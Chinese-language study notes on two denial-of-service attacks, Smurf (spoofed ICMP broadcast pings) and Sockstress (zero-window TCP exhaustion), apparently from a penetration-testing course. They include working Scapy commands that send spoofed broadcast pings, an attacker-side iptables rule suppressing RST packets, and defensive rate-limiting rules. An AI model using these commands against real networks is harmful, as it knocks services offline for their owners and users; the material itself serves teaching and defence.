Smurf攻击
十分古老的DDoS攻击技术
对现代操作系统几乎无效(大部分不响应目标为广播的ping)
只在局域网里
向广播地址发送ICMP echo Request(ping)包,伪造源地址,由于响应太多所以,造成伪造的地址拒绝服务
Scapy
i=IP()
i.src="1.1.1.2"
i.dst="1.1.1.255"
p=ICMP()
r=send(i/p)
一行Scapy
send(IP(dst="1.1.1.255",src="1.1.1.2")/ICMP(),count=100,verbose=1)
Sockstress攻击
2008年由jack C.Louis发现
针对TCP服务的拒绝服务攻击
消耗目标操作系统资源
与目标建立大量socket链接
攻击者消耗资源小(CPU,内存,带宽)
异步攻击,单机可拒绝服务高配资源服务器,建立的链接都需要用资源的处理
完成三次握手,最后的ACK包window大小为0(客户端不接收数据)
Window窗口实现的TCP流控与可靠传输
添加防火墙规则
iptables -A OUTPUT -p TCP --tcp-flags rst rst -d 1.1.1.1 -j DROP
防御措施
直到今天sockstress攻击仍然是一种很有效的DoS攻击方式
由于建立完整的TCP三步握手,因此使用syn cookie防御无效
根本的防御方式是采取白名单(不实际)
折中对策:限制单位时间内每IP建TCP连接数
封杀每30秒与80端口建立的链接超过10的地址
iptables -I INPUT -p tcp --dport 80 -m state --state NEW -m recent --set
iptables -I INPUT -p tcp --dport 80 -m state --state NEW -m recent --update --
seconds 30 --hitcount 10 -j DROP
只对单个ip有效,但是对DDoS无效